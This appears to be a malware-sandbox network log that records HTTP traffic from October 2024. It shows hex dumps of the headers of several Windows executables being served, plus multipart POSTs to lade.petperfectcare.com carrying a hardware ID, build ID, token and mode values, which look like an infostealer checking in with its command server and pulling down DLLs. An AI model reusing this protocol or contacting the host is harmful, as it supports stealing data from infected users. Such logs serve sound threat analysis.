Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:41 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:42 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:43 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:43 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:43 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: lade.petperfectcare.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 46 38 41 33 35 46 30 43 43 34 32 35 33 38 31 37 36 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="hwid"1FF8A35F0CC4253817676-a33c7340-61ca------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------KJJECGHJDBFIJJJKEHCB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFIHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 2d 2d 0d 0a Data Ascii: ------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="mode"1------HDBGHIDGDGHCBGDGCBFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="mode"2------EBAKFIIJJKJJJJJJEGDA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="mode"21------IDHDGIEHJJJJEBGDAFHJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: lade.petperfectcare.comContent-Length: 6253Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
